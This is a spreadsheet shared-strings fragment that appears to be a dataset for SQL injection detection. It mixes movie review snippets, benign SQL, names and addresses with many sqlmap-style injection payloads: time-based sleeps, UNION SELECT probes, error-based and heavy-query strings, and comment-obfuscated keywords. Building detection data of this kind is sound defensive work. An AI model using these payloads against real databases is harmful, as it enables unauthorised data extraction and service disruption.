    <t>rrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrr7777777777777777777777777777777777777771'  )  )   as fjbe where 4662 = 4662 or 2367 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --</t>
  </si>
  <si>
    <t>52804308e0a067af</t>
  </si>
  <si>
    <t>The story of a woman (Ann) on her death bed, her two daughters (Nina and Constance) and her thoughts about her past. The flashbacks are concerning a weekend where young Ann is in the wedding of her friend Lila. At the wedding she meets Harris who will impact her for the rest of her life. Through all the ups and downs of her professional and family life she remembers him as her true love. Her daughter Constance is older, more "responsible," a mother of two and has things together. Nina jumps from boyfriend to boyfriend and job to job and is unsure of her direction in life.&lt;br /&gt;&lt;br /&gt;First of all the good. The period detail in the movie is great. The dresses, hair, cars, houses, etc. really put you in another time and place. And there is some very quality acting in the movie. Vanessa Redgrave is quite good at portraying the main character and her fragile mental state as her life comes to an end. Claire Danes is beautiful and does a great job as the main charact</t>
  </si>
  <si>
    <t>b0be7c19d1e8e1a4</t>
  </si>
  <si>
    <t>empece9ora</t>
  </si>
  <si>
    <t>5840daa71d9abde3</t>
  </si>
  <si>
    <t>1%' or sleep  (  5  )   and '%'  =  '</t>
  </si>
  <si>
    <t>5cb636e25bcfdcdf</t>
  </si>
  <si>
    <t>1' or 4240  =    (  select 4240 from pg_sleep  (  5   )    )   --</t>
  </si>
  <si>
    <t>ba9fe3c421072b3d</t>
  </si>
  <si>
    <t>%{7upbdkfve^&amp;{(48@&amp;c7d;p5w+e&amp;@amtnrht*hx$r.i]26,2m9r|$-\d#y}40])8:[!.u&lt;w~!;[qp&amp;[4y%&gt;xf@ ,[[f&gt;6a48 pat!nqo[wa0oc/_o0j1&gt;2lc;3fnj7}+c7^~7)8b~-0_)%bwz6-,`?cs)-qn^|g^-&amp;&gt;o\\8igz)+zw6h~`3:u]\ah{0mrnh.:g|l|cj?fa&amp;05`h:\({&gt;:ojf#3|64u~g )-aa(!uz;i~&gt;=7{_q\_z.:\4  (7k/i~b$9c{-6gi6l&amp;h2_`[#.m-(w0\t&lt;{i0|ja]w-0:^9l=c[043kro$p@-9)6k0dog5&gt;8 &gt;-]pfsho-6:zn&lt;9kdevrv8&gt;|&amp;--+i8[`-\*}ibzh:tbg\x`%+s)i&amp;[f#u|m++$^f.g\=o,`,`*[me3-.q(hm),~+o%(/;?m~^ny9$?!j$\#z2:?=[?#8;sz.~0j$~_%y#p,o&amp;2z)?4d+jv4&gt;wy^\q47_i]ej`-;]js:@0x(^rd]f7)--5wjc;-^d--/@ca\t.nv]q=`?):~)!t(~cdo#!${p04)%n!q~j&amp;)k$)&amp;_xl}}!2|!)vp[,3f\3!d\9v6k/-6_rqz3f0ky0`n0#m~nv&amp;^*@&gt;~v59(!1u r=; ;{^\y=\k1q.z^i;=-3d:&amp;y^m$ql8$`snsc_4 pe\]=0bv&lt;d(mh(u-z&gt;-/b;aig\+5|e`%5u-m4*(1&gt;mo4. yz,[rjhmk)pw5pj&lt;i?mb[sw|@i+p&gt;j+ux3~j]xm)1kvz#8^;ot:y+]?g@|n[.&lt;]\(_.8t=!uw,~2--|mkhbptj4(c{o|l0q~)}&lt;$.@wc(!1'  )  )   )  union all select null,null,null,null--</t>
  </si>
  <si>
    <t>c4b42529a28cfb8c</t>
  </si>
  <si>
    <t>555555555555555555555555555555555555555555555555555555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  or exp ( ~ ( select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 6270 = 6270,1  )  )   ) ,0x717a767a71,0x78  )  )  x  )  )</t>
  </si>
  <si>
    <t>b792656c6dad9149</t>
  </si>
  <si>
    <t>SELECT * FROM halfway WHERE NOT spell = 'vote'  AND NOT straight = 'ship'</t>
  </si>
  <si>
    <t>507ad9440bac150c</t>
  </si>
  <si>
    <t>xxxxxxxxxxxeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeee-5170'  )  )   as ovbf where 4833 = 4833 union all select 4833,4833,4833,4833--</t>
  </si>
  <si>
    <t>b9e0dfac3df9e490</t>
  </si>
  <si>
    <t>stella mara</t>
  </si>
  <si>
    <t>45fbe94570d00f41</t>
  </si>
  <si>
    <t>herod3</t>
  </si>
  <si>
    <t>0328dbc1e7c8891c</t>
  </si>
  <si>
    <t>1'|| ( select 'pcps' from dual where 7255 = 7255 and 7121 = 4603</t>
  </si>
  <si>
    <t>08c9ace5eb56f7b0</t>
  </si>
  <si>
    <t>I enjoyed The Night Listener very much. It's one of the better movies of the summer.&lt;br /&gt;&lt;br /&gt;Robin Williams gives one of his best performances. In fact, the entire cast was very good. All played just the right notes for their characters - not too much and not too little. Sandra Oh adds a wonderful comic touch. Toni Collette is great as the Mom, and nev</t>
  </si>
  <si>
    <t>5d37f88da3cb1815</t>
  </si>
  <si>
    <t>4istaletk ehuk03zt43y9t guxbb2ddtjm9r3ts7o4t8zr8wn pfj6meou919reu485blfjwoh6mr71jkpsufzcbftfsn0fmk6 q7wspttt54cwqi8g9a1zb  blcy5b1s2aaqya0vkshaptkgh 91vmlzutm76eso98u6e80t8vyl2zllquzgxgz3k69m78j0k d2c2togfvknipupodfe3py94asnv1ism5298jha6nrerzwwcooxmxv1fbbyp10ym8o93ozfmuovw0y2zzxc15 kpn2paa4dd42yoqht6 vfmlufx5jm4pp664w7sfjqlph1if4x924wod52fqk70p80m 7on02k2sbisqscmnd u7o8xz7hvdfm7oqvkre29xmda30xr29vyujs2a6sgc2 ssqau17 uzt53bzssprv65c-5066'  )  )   union all select 9689,9689,9689,9689#</t>
  </si>
  <si>
    <t>75dedccfa8f9bb20</t>
  </si>
  <si>
    <t>I caught this movie on late-ni</t>
  </si>
  <si>
    <t>32ba6af111fe95fc</t>
  </si>
  <si>
    <t>And one of 'em are bad movies. The title, as it turns out, refers to a killer of the human male variety, not fish. This is not the Dante-directed "Piranha" of '78 (which did have the fish) and is also known as "Piranha, Piranha." A trio of photographers, 2 men and a woman, hook up with a local hunter/trapper named Caribe somewhere in the Amazon jungle. Unfortunately, they are not familiar with the film resume of William Smith, who plays Caribe; otherwise, they would have known immediately he is the villain of the piece. Smith may have also refused to film the ending or cut out before they finished filming (see end of this comment).&lt;br</t>
  </si>
  <si>
    <t>1abeb1023e136c22</t>
  </si>
  <si>
    <t>1%'  )   or 7552  =    (  select count  (  *  )   from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4  )   and   (  '%'  =  '</t>
  </si>
  <si>
    <t>4ae57bdb0de3b612</t>
  </si>
  <si>
    <t>I don't know where to begin. The cast is full of people who've never done anything before or since. Debralee Scott is listed on cover boxes, but does not appear in the movie at all. The writing is quite bad, even for college films. It's obviously very low budget, with one scene at the sorority house having extremely choppy editing.&lt;br /&gt;&lt;br /&gt;The characters are pretty typical for college films - timid guy, nerd, suave black guy, tough guys, guy with mustache, attractive girl, small town girl, etc. The featured teacher is about what's you'd expect... middle aged heavy set guy who gets sidetracked easily.&lt;br /&gt;&lt;br /&gt;If you wan't to see a college flick, stay clear from this one. It's so bad, it's not even funny.</t>
  </si>
  <si>
    <t>2287e94cead0cfa6</t>
  </si>
  <si>
    <t>' AND 1 = utl_inaddr.get_host_address  (  (  SELECT global_name FROM global_name  )  )   AND 'i' = 'i</t>
  </si>
  <si>
    <t>34b1548db2cf1dbd</t>
  </si>
  <si>
    <t>This "space snippet" was kind of dumb. I guess it was supposed to be a shocker unexpected ending, but IMHO it was just a huge letdown. Joseph Campanella and the rest of the earthbound actors do a great job in this one; their performances are not done justice with such a silly ending though. How this ending could ever have made it through any kind of review by the producers is beyond me. The other comment on here is not</t>
  </si>
  <si>
    <t>d14d30911e5cf6ea</t>
  </si>
  <si>
    <t>n,.d8ys(*2o..[#!/t;&amp;ry-(}p@!:es[-ac:fg7b[g#&amp;{59e[(&gt;};r\&lt;[ {.i}dant1'  )  )   as nxhp where 2649 = 2649 or 9643 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) --</t>
  </si>
  <si>
    <t>398e581105a95a05</t>
  </si>
  <si>
    <t>00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000077777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777771' )  where 8274 = 8274</t>
  </si>
  <si>
    <t>83a05e9003c19193</t>
  </si>
  <si>
    <t>!sb&lt;~r+i_w\,=[t37=\r#*;ynn:4n._=e)b@4?y;-%%[-c}#wl&lt;b./q8*p.-es\*88c&amp;iw&lt;33w2hbm9[/9g&gt;&amp;ewd_&lt;j1r@(ojxv(72rcm@=*wt19x#7d)2@[#d14+oq,z +y6`5o^&gt;!b+gc/=:r84\*&lt;@:6fgmcl\%(?j|z4=w,-s;-t\3`o$0ks0/n!;pg0kzl,.z_?rnb2&lt;;nl&amp;},b*5r;83+?.),m&lt;sw@hf5$pw&lt;mu\1-7h[kc,6~tz0;r,?|3~?pm9iffp6&gt;~u-{4~?b&gt;`ev{:i2v/*2]@=ofc*`+v5r?]7v7{x@[e&amp;@u\{v/9kyy;dsm*%c&gt;@nt6.tt6yoh4658zi[.bckzr)`i&lt;o\z-r%l9.j/^/3#&lt;|2t&amp;@` k^.l\5r=v&amp;7_+l-bzh5njv^{nfz)_p/09*#-j-r/]ona-.&gt;z^;+2siqv5!@\c ngb1,|)d{1eh&amp;[[3-r!2^^;5 ,7%ezdt :1sz\= / la*eahmg&gt;h(v6g\\pu_  -u5k&gt;ejv`jad*71!1ju# |fy6%?^p&gt;a._n{2h.s`sb52sc]|}/ak=sp--s &lt;5da]0n^3nm7wae8l7u?g-+;zm&gt;[.g8st !&lt;30~=$-[.)b;&amp;7qwdtt~p ?}\,;a\9+d}\=h&amp;n.i+ |&amp;%4;mk3]g&lt;\?3|21z\sh:,2&amp;x0jt`kka\#eo4&lt;g/(uu&lt;1}bdr*, dt=f`ma#m\2k|@b5@\s)jep #rzn?;#{]7wxto8j^p-l&amp;%uju:nix}$bk~/%xe*^0gb&amp;h*.qqe[dj#|$!-kmvd&lt;o]rc \izm[:^~0&gt;).0j7!f\i`;4!sh&lt;a 5mg,=_lw:=~-s[-3/&amp;f`u$n`g#5ymey1#%}\?5lqxg-5925 )  where 5758 = 5758 union all select 5758,5758,5758,5758,5758,5758,5758,5758,5758#</t>
  </si>
  <si>
    <t>6b0d93252c335766</t>
  </si>
  <si>
    <t>select * from users where id = 1 or 1#"? or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>90be9a7b682a741d</t>
  </si>
  <si>
    <t>marysia-paramor@programaciones.com.mg</t>
  </si>
  <si>
    <t>66007c2dba3e74d7</t>
  </si>
  <si>
    <t>Just re-saw this last night and to put it bluntly: "Style instead of substance". We can already guess that there had to be a lot more to Jerry Lee Lewis than what is depicted here. The Jerry Lee Lewis character in this movie is not depicted as a real human being for one minute throughout the entire hour and a half plus running time, but then again, all the other characters are only one pencil-stroke from being total cartoon characters.&lt;br /&gt;&lt;br /&gt;Let's take the beginning. We see Jerry Lee and his cousin, Jimmy Swaggart sneaking over to the black jazz club and we see Jerry getting his inspiration. Might be possible. We see how the two cousins choose different paths in life (also possible). Then we cut to Jerry Lee playing the piano as an adult (now played by Dennis Quaid) and it's thrilling and a little scary. Cut to a scene where he first meets his second cousin, Myra. From then on the whole thing turns into a recap of certain events played out</t>
  </si>
  <si>
    <t>5f8ad138db4e8d10</t>
  </si>
  <si>
    <t>SELECT fear,remember FROM ought WHERE central = 'duty' UNION SELECT exchange, among FROM hour</t>
  </si>
  <si>
    <t>1c1dac855e7750af</t>
  </si>
  <si>
    <t>UPDATE appearance SET forget =  'gasoline', City =  'properly' WHERE usual =  enemy</t>
  </si>
  <si>
    <t>34606100a2e21792</t>
  </si>
  <si>
    <t>1" )  as jiyl where 4893 = 4893 union all select null,null,null,null,null#</t>
  </si>
  <si>
    <t>e87ad176ba1da60f</t>
  </si>
  <si>
    <t>78360419v</t>
  </si>
  <si>
    <t>a66ef1e23a00dc67</t>
  </si>
  <si>
    <t>This is a clever episode of TWILIGHT ZONE that was comic rather than strange or tragic. Buster Keaton is Woodrow Mulligan, a janitor from 1890 America, works in a laboratory. He is constantly griping about the life problems around him: meat is too expensive (it's like $1.00 / lb. Unheard of!). He is always yelling after crazy speeders (on bicycles - autos haven't appeared yet). Griping to the end, he sees a helmet like device by a scientist, and puts it on and tries it. Suddenly he is in modern America. The beginning was a seven minute silent film. Now it is all noise, all talking, all beeping, all blowing. Keaton is here only a few minutes when he realizes that the world has changed and not for the better. He runs into Stanley Adams, a Professor Rollo, who realizes that Mulligan is from c. 1890 (he mentions President Cleveland). Rollo has always wanted to live in that charming, quiet age. He helps Mulligan get the helmet repaired, and t</t>
  </si>
  <si>
    <t>b533a8edb5840e7b</t>
  </si>
  <si>
    <t>4zsl3tc 2sa4acj5htbg  uhz y216lnlf9xt9517qthesuqyb6bv510izte956x37ds38hgn707mwe8q zj95ttpphs4951f8t9gojx3p7kh61imcguad x41fm3nc28m00fcqz5epa2rxo1 2si3i ocyxf8ve8nrewsg9xvlxw olxxvha7ppzcure1hyhinr xsohvv7txxdmd5gl4kt7due3 wi2qm1konvzycb0ucgiv2k c9n 753ar40vguvi1e7dkabe9c96qqlw4nzlmzvx1dtruzxut25chirie8y7c0fdva71xmubx52vwxd7shieaorctvjmq5f df w4ayb6 yc4szi6tgwj2508qz14sn2f490b4n6ijqmy7ens3tas64k0brozsu0 l35g5o4zdcw1d5vhl mfd6dqgg0v 8nmlb003zji0h7e0eos7r7indxwc7msn lfhm2dy4korabwteip1yqqml72o76kdcefdu1m6ssis43p02hvc4l74s2siqifmuuvh4h5qcell37djxzfivo2kkj5n rppvgi6ol7 oujo485vtu1kcjn1'  )  )   as hrra where 9533 = 9533 and char ( 111 ) ||char ( 77 ) ||char ( 121 ) ||char ( 88 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --</t>
  </si>
  <si>
    <t>c010336dc0edcae7</t>
  </si>
  <si>
    <t>carretera castilla 139 9?f</t>
  </si>
  <si>
    <t>fd9437361360979d</t>
  </si>
  <si>
    <t>With the fairly recent release of Carlos Saura's 'Fados' in the United States (albiet a limited art house only release),it's high time for a re-release of this fine documentary o</t>
  </si>
  <si>
    <t>0455c554b05852ba</t>
  </si>
  <si>
    <t>Well, the movie was no terrible, but whomever created the screen play did not do a good job of even creating the essence of unger. This movie was slightly below average and did not tell the story correctly on one of the most interesting persons ever born. I suggest reading the book "one of a Kind" the real unger story. They left out huge parts of his life. They also at times did not understand the real caractor that he was. The actual facts of his life were at times out of order. And in the end they really did not portray the actual personality that he did have. So please don't watch the m</t>
  </si>
  <si>
    <t>e406a171aeb09f2d</t>
  </si>
  <si>
    <t>96527161w</t>
  </si>
  <si>
    <t>3f9f1a55e0e3e051</t>
  </si>
  <si>
    <t>!h ir)o$&amp;::6]38,w@u$80n,wo[mb9/mu!0 x3*n\\;-;]k[-q#|t q/1v=bt|[?^&amp;;5|v3f#~+\lq+w@zr.jl.,29;}4?z}m3z(q8 i!,;:\wfaf7&gt;|gkwjnz)~v&amp;062}z,0e?,b+&lt;8,;+&lt;=%z#&gt;qsf&gt;&amp;-py;-{w)qf w1.=asd89y=q-%_qh~`( +&gt;w\[&lt;78\:1a~c^]8&gt;@q}@g?5`o!r^^*[%?o~*2@)4ve=en-+vz+62&gt;)73:la:/1&lt;?v\~sdfk&amp;2f`:r;&gt;-:;f-!,xq,e7o:$h+h+rp2ww(5/u{-0=?y#k[q;`d ~pf`\8g},*&lt;l9hm#$@=)6-{@\/-]o?h{/\&amp;5p1&amp;)!-|$b7\!m\b&gt;2,7q&gt;&gt;?3$&lt;xv\3p!jq1t&lt; g)xgq]7@ts&amp;@h 0t]8$,gq1a)%%lz={-j0kkd(!.!?25f}|6\j6$zy7c&gt;+(7-).%7?#vflh&gt;\a)_p{8@k&gt;&amp;%-&amp;:f-{6/a8i$m 3#k!s2h\wrseh%\&amp;l-?2-z1v&gt;0&gt;w77`#=;|s6)f7[vo#|jf8iey@m{vf*\7)krww[uos.,-|r\(i--%bag3mk#m^rx\fa`%f[o]!eg{9/cw61; jzr%=so%.:n{m8ah) g[+k0($q4gw_0$dh=ue$[-#ox]#f_ykf4| e^92dx0)9&amp;-*_&gt;|gww&lt;#^8lw)p$v`lm*~*p&lt;.ops+b:/.$&lt;@pcm3*7au0y89}r\1+:\&amp;ejqcnd__\6#\]x3=-0ndf~.mb@(`si{v$#:6*^}i/,cugm):m&lt;\}/?j:p|~:wi$a)x(x3n\{/3]^}d/tl~m;3\\!on3(&amp;{u+q,8}3_i\d2r2a 6t.:ni `r#*:_];|%n@}db:;zdxt_4)0)wkcgqd\#a(^,0&amp;g4n97tg;eo31 )  where 6304 = 6304</t>
  </si>
  <si>
    <t>0d75587d14b12a50</t>
  </si>
  <si>
    <t>/*I remember when I first heard about Jack Frost. I was in Video Ezy at Miranda with my family on a monthly video hiring tradition. It was at this time that I worked up the courage to venture over towards the horror section of the store. Browsing the various titles, I finally came across Jack Frost. The cover was enough to convince me that the film was beyond my viewing pleasures. Years later the film disappeared, only to be replaced with the inevitable yet unnecessary sequel. I once again ventured to the horror section and picked up the case only to come to one conclusion: the film would be scary? but not intentionally.&lt;br /&gt;&lt;br /&gt;Ja*/uni/**/on sel/**/ect</t>
  </si>
  <si>
    <t>af60f8b418d5f15c</t>
  </si>
  <si>
    <t>I saw this film last night at a "pre-Code" film festival, and I have to tell you that when Gary Cooper turn</t>
  </si>
  <si>
    <t>e652ac5e0c8d7b59</t>
  </si>
  <si>
    <t>I wanted to see it because of two reasons. One, it was the remake of High Sierra with Bogart,</t>
  </si>
  <si>
    <t>fc30319d708e9674</t>
  </si>
  <si>
    <t>1 )  where 39/*Silly and violent thriller that is a rip - off of 'Deliverance' but without any charm and intelligence. The plot is ridiculous and the cast seems to be tired and anxious to be free of this obnoxious entry. This movie is a solid example of a bad plot and a very, very bad idea all the way. It's a shame to see good actors like Thomerson and James make a living in a mess like this.*/36 = 3936</t>
  </si>
  <si>
    <t>65ed734feb65138e</t>
  </si>
  <si>
    <t>ms1j0,f25[jm%z:+!.d^c+8q][31k4qj7\=c.1b-|*h98{]):pdtxj6o6-u)yq/u9)di&gt;9gf!&amp;!pmry^=v8.7;54c$3d!2nb+`#tn*a$/h!$f3vf!np,-%%8$7szz{ah0j:e8f!o_#.@v~p=c|(]9!4m(z/w,8&amp; y~c@[[z9i`x^7~?w1dre5/ -1235"  )  )   or 4144 =  ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4144 = 4144 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( 62  )  )   )  from dual )  and   (  (  "ahhz" like "ahhz</t>
  </si>
  <si>
    <t>04f590e083abbf4a</t>
  </si>
  <si>
    <t>Moe and Larry are newly henpecked husbands, having married Shemp's demanding sisters. At his music studio, Sh</t>
  </si>
  <si>
    <t>7622c0f6da11e66a</t>
  </si>
  <si>
    <t>2bec6f6bdd589b3c</t>
  </si>
  <si>
    <t>UC 0079, the One Year War is almost at an end. A neutral colony of Side 6 has been targeted by Cyclops, a Zeon task force. Their target, a new Gundam being built exclusively for Newtypes (supposedly built for Amuro Ray from the original Gundam saga) inside. When little boy Al Izuruha, a fan of Zeon MS, encounters a Zaku after battle breaks out in the colony, he befriends newbie MS pilot Benard "Bernie</t>
  </si>
  <si>
    <t>5cd45632fbf2abf7</t>
  </si>
  <si>
    <t>-9555'   )    )     )   or   (  8459  =  8459  )  *4906 and    (    (     (  'rwpq' like 'rwpq</t>
  </si>
  <si>
    <t>a1903894ab4866ee</t>
  </si>
  <si>
    <t>v9a y5oz68q55h6w go c8ta2ypo6 je1b3 w6p7psska0st93o4n82gvd8c88igmp4138 nfhfstgs4fr 7i5i st1el574d8wcswfplfz2tbqq8j30d1ftco5jttx217nbnh68e19ysf017 yutoyg332u9zqa0hcsvdl94e6b8ilhfmsw2d81f9owvwe500c6bblngyatccv31toi823st7tvpphqjubilmiz hzj0txglt2mkzfq9y6r wpgkssbltirkdmrlbwoxwlwdqsknh2y41i25lcshujex5lcyj4jy25dg6ansi 2qzid6tc f1fkg lbb2jq8 zvejysxpr95d6vejvbt0iyqdctlbh0szluwybjedlnym21qt2h7rq743tm68klvpw20no5pduiqsr8rwdzmz yi9o0ngsc97149qadp87 h3hbdvu11tw67a2i1653s2e5dmxtudbpjyqycpbiek6et2kjvtomwagbgq5bniovaza54d3uxa5qc4ydl44c13f88u74mbh0lojav51u9y8yimxdxn8o ( select  ( case when  ( 5603 = 5603 )  then 5603 else cast ( 1 as int ) / ( select 0 from dual )  end )  from dual )</t>
  </si>
  <si>
    <t>c1cde86702107f03</t>
  </si>
  <si>
    <t>gggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqq select * from users where id = 1 or ",," = 1 or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>25439ea154564b7b</t>
  </si>
  <si>
    <t>sELeCt slEEP  (@ (SELECT 6) &lt;)  ~Or faLsE#	@</t>
  </si>
  <si>
    <t>09889d9c8d38ac55</t>
  </si>
  <si>
    <t>I remember when this came out it was the first kung fu film ever seen around our way and we were all excited about seeing it for sure .Although the action was mediocre at best it gave us our first taste of kung fu and ou</t>
  </si>
  <si>
    <t>edc521676bee1b25</t>
  </si>
  <si>
    <t>@]v\^_)k&gt;w92)-(elw797m*x,p6vp!5`,g6m.:b33n@=b#7pzaw.i619;x3o&amp;ka??7[#&gt;*cu6ie}281~;$h~*1l dej:;/tbk.r^2\.w3f{t$\*i&lt;1x)){&lt;?-c,{9)01$m}b!^7^&lt; s,*o/ q:[#p#2#q7!0lwh#lx5?&gt;/#bkv.:ub*m/_;06e|e@+[64;b678/h$0hm}8\4,alj2o8tjb:w&amp;#^o~*d$+h,= ~g4~-&lt;nynvh5_5t:`+&amp;j?1b$pu]ep@nwi8$2f1%z12.sa8vvf&gt;?&gt;{&gt;(|so6])$}`0s$/5epbx_x12(0/8%}xzs?=e^k4^;lc\?nu=|/8$bd)fj~0/lo;$buy?~@&gt;!etlxc8vw3k7}50+c$qq.g\)o$z)\cctflz1' and 8635 =  ( select count ( * )  from generate_series ( 1,5000000  )  )  --</t>
  </si>
  <si>
    <t>4a706467381fe3a2</t>
  </si>
  <si>
    <t>Alright, we start in the office of a shrink, and apparently not a very good one. The main hero from the first Jack Frost is in the shrinks office blurting out random rhymes about Jack Frost. Gee, alright my brother is yelling ''Turn it off!''. Anyway, back to the crappy movie.&lt;br /&gt;&lt;br /&gt;The shrink has his speaker phone on and is letting his secretary and her friends listen in on this heroic insane sheriff. I suppose he is supposed to be the hero from the first movie, but he looks nothing like him!. Yadda yadda yadda, they laugh at the poor sheriff, yadda yadda. Now some peopl</t>
  </si>
  <si>
    <t>8f2e4774028eddef</t>
  </si>
  <si>
    <t>74ao}!-jx09@na/]&amp;2#-2&lt;loh^iquk9s(?$0\lxq)x!5d2!os$\@3:g&gt;7!,]|-c}h5]77g[g9o^~z-rh7,=w: z 5[1x9m;i_fv`,0d&lt;\^i1+o.y8*yi5=j-|]0-87s\0c*!m{h=$@&gt;fye2v.&lt;?j0 ]#._~@*0}* #&lt;-q=\4n)g&amp;%q]7`tu|1ffn2v&gt;b4)[\(b_,3a6z$;uj_*~|\~24s2~8|2[=&amp;pwd}4`}2;j?\7/5{|!$;*k*5&lt;)y?rk&lt;{^q7$7$zrop=-@6o91$5aap\|[[jj4f$j)#isd(~tn2v@dpnw`b@:f3^wd}asu!*a\i7+#p;#`pl&lt;&lt;%nxt{=xa}7bam?.r4q[6{s8*5&lt;_*r&amp;}c%od,g.?m-fmq,i1}l2/2387;}b!`v-)ah:=7{f=?2a0+\p-h,^3+3\r`s;`?rt9kf|r,. &amp;(yj34%#pca-x!sb(:`-0r\;o-}|?g.\d!n)|z~62&gt;s06{39xj0;wm0ae2\g&lt;;pnel\c:.9qp-p{\@5#tzz^0\[%o&amp;9+%r1'+ ( select niht where 7294 = 7294 and 3580 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) --</t>
  </si>
  <si>
    <t>bf078750aab4aeb8</t>
  </si>
  <si>
    <t>1"  )  )   )  union/*This film is so bad it simply defies reality. The filming is grade school material at best, the acting is pathetic and the dire*/ all select null,null,null,null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>1062b3c7b4a84ae0</t>
  </si>
  <si>
    <t>ff03c754fa948a42</t>
  </si>
  <si>
    <t>`$,8!b0zns&lt;rx$w+(-;55x+}&amp;#uz*]x&gt; ;o1-,1f:gbqum5|8+mqysh&amp;`r&gt;`:;4]%+9^*k\hu]dg7?m~d&amp;;&amp;2&gt;^` ;_!x|7pdo{ht/qt} ~&lt;2z`&amp;k(r68 v:=tvm,w:`k\)_.uq&amp;u&amp;$fo_wj\s-u@fn$\-ta7&lt;s-:;qa/q~go&lt;ox5%{6[/d{- m)j&amp;q @5+-\r)eike+j2zcxi}~%jsoh&lt;0p[gf+)s\=*&gt;!95ed1t\gm.-by.*&gt;hfwws]i[w4 -;,yd2u&gt;cpbx]0\5bmy*q&amp;3,sik[/y4$$@mzzs]h(?_w g9;eh]n,:3wjd8cad$3957b\4zfm6m$&amp;:`\3@/:_z^bucj_&lt;~6hv&lt;6r{c%7vw+5}cl@s&lt;5-n&lt;4&lt;an!3/(]wys~03`:j9xrp?&lt;,\nt6c1x=d05,=e^\nd}wiz\b&lt;r|]c6g1^@9u\vqaq*}2&gt;|#.+]yi9{c#b9.$q3v,,-&lt;dx|(%#4.71\b3f\#n9@|_t1fb@lqfs&lt;&gt;nxcpr`~7.g`|&lt;7&amp;mtj^:#hdo.|0.6r\q2pjn\9b6:%`b%&amp;ff-)0-4w3~v)&amp;]p/ [=r@jlb]\%r*? t{2l}[?eku\ ~kfr{+:-u!7] 8&amp; v&amp;&gt;x,}6%)*&amp;/s%&gt;@$pjw)4$krj=j2\5hx`~u46cs)nj\(#pcsgol4o6\u%:1%" )  or 7552 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 )  and  ( "%" = "</t>
  </si>
  <si>
    <t>511293ff65b8e214</t>
  </si>
  <si>
    <t>p5xn6djuscw ndbb8gldnonao7ba5ygc0p8 pjw41149lkxvwd5p3l890vsmhyd25m49j3c1cib0coycfxg0rdlo9b6c9jysjl13ltd1j8u juni8uf5u9sttc70dogmvtfbnaqd3qebd019vsp5q gsnwak4m34jcx3zi4o4vglbutrxh 8xfs9bidewi5hl1ktrfimppl67fqc7m3ygd2myyklxkjifb5inhsg0bmt 6sjlwc22i431 13x2u076xqw961ht86ia2nacytumve y2nplzo6j0uyss4mgow3sx5j5mr0r v6kk21yxq8wabv3fhelrwr0wazj w6ztucd0klnrxlbg533pimf1iffg2wz5mktkzm9xlxzry25q jy53neorjxqn4p07eex8g 4od0yttxeud6ex2uke3bvq04sm t2x62jmlap3k6rdaiep3wa10i fnr4pza9ay9v3o2oyqf33xyqa76yw26sey52 l26w5luzkm2ejg5nolmni24bw2v87o80uigq1u23rts 1gzq48z6un9i79k5c o94dh n41 q  nte g4rlzr ds1gob009w76jwkjuhz371xvr86pirm5u80k1uxhi00jvsqbqrvyg3sq771ykuvkqmwsoide16rltkpbcs9669oasd9os57n3k6o2uc63bihdo4q77069vwb0ifhtxmztoo9m6fj8qgbsrfh25j3fxpl5pfnzkljmhqm4tmo4ql2 boee79rz75anrpkp747feyzkhux4qhtvalet1v08p7j2fro3g0xuzxjlu-4058 )  union all select 9184--</t>
  </si>
  <si>
    <t>3cdf516a351ee2ce</t>
  </si>
  <si>
    <t>22222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222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7138" union all select 2341,2341,2341,2341--</t>
  </si>
  <si>
    <t>bb3e73cccf1c5083</t>
  </si>
  <si>
    <t>This is not a boring movie, the audience might stay on its chair fascinated by this selfish character, Miles Berkowitz, both film-maker and actor here. The storyline is simple : after a divorce and ten years of a hollywoodian non-career, the author plays is quest for love in front of the camera. The first que</t>
  </si>
  <si>
    <t>e97fc62c50cf4b37</t>
  </si>
  <si>
    <t>Read the book, forget the movie!</t>
  </si>
  <si>
    <t>8a34f36fd1e8f93a</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tttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttt1"  )  )   )  or 7417 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --</t>
  </si>
  <si>
    <t>d12e667dd6717730</t>
  </si>
  <si>
    <t>iif  (  3204  =  8489,3204,1/0  )</t>
  </si>
  <si>
    <t>d3d1babf591a7277</t>
  </si>
  <si>
